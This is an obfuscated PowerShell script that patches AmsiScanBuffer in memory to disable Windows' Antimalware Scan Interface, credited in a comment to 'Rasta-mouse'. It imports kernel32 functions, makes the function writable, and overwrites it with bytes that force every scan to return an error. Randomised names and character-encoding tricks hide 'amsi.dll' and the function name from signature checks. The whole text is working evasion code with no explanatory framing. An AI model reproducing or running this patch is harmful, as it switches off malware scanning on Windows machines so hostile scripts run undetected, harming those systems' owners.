#Rasta-mouses Amsi-Scan-Buffer patch \n
$ftnax = @"
using System;
using System.Runtime.InteropServices;
public class ftnax {
    [DllImport("kernel32")]
    public static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
    [DllImport("kernel32")]
    public static extern IntPtr LoadLibrary(string name);
    [DllImport("kernel32")]
    public static extern bool VirtualProtect(IntPtr lpAddress, UIntPtr fsiwaf, uint flNewProtect, out uint lpflOldProtect);
}
"@

Add-Type $ftnax

$xzwhyfx = [ftnax]::LoadLibrary("$(('ã'+'m'+'s'+'ì'+'.'+'d'+'l'+'l').nORMaliZe([char](70)+[cHAR]([ByTE]0x6f)+[ChAR](114*15/15)+[CHAR]([ByTE]0x6d)+[ChAR]([BytE]0x44)) -replace [ChAr](92*49/49)+[cHaR](112)+[chAr]([BYTE]0x7b)+[chAR](77+18-18)+[ChaR](110+60-60)+[cHAR]([BytE]0x7d))")
$mjxytf = [ftnax]::GetProcAddress($xzwhyfx, "$(('ÃmsíScânBuff'+'er').nORmAlIzE([Char](70+9-9)+[CHar](111)+[cHAr]([bYTe]0x72)+[chaR](109*88/88)+[cHAR](68+42-42)) -replace [cHAR](92*17/17)+[chaR](112*23/23)+[cHar](123*15/15)+[Char](77)+[cHAR](110+55-55)+[CHAr]([BYte]0x7d))")
$p = 0
[ftnax]::VirtualProtect($mjxytf, [uint32]5, 0x40, [ref]$p)
$tgbd = "0xB8"
$kmqv = "0x57"
$rrjs = "0x00"
$rtyu = "0x07"
$jrmn = "0x80"
$qyft = "0xC3"
$picgj = [Byte[]] ($tgbd,$kmqv,$rrjs,$rtyu,+$jrmn,+$qyft)
[System.Runtime.InteropServices.Marshal]::Copy($picgj, 0, $mjxytf, 6)
